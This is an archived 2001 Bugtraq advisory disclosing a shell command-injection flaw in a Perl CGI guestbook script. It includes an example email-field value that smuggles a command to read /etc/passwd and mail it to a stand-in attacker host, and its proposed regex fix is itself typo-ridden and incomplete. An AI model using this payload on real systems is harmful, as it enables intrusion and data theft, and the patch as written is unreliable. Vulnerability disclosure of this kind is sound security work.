[23020] in bugtraq
cgi vulnerability
daemon@ATHENA.MIT.EDU (supdavid)
Tue Oct 30 12:24:09 2001
From: "supdavid" <supdavid@bluewin.ch>
To: <bugtraq@securityfocus.com>
Date: Tue, 30 Oct 2001 16:04:23 +0100
Message-ID: <KKEJJBACFEGPLHJMEBMMCEFFCAAA.supdavid@bluewin.ch>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
hi all
I found a security hole in Book of guests and Post it! written by Seth
Leonard. It is available at http://www.dreamcachersweb.com
The problem is that this script doesn't filter out ANY metacharacters from
the input and pass it to the shell.
Therefore by writing something like email@mail.com;cat /etc/passwd|mail
evil@evilhost.com into the email field, the attacker could take control
over the host.
patch:
first of all it isn't a bad idea to set the permissions of the script
corectly. Furthermore the line
if ($INPUT{'email'} =~ /(.*)@(.*)/) { ... } should be replaced by something
like
if ($INPUT{'emai'} =~ /^[\w-.]+\@[\w-.]) { ... }
David Kumme, 16
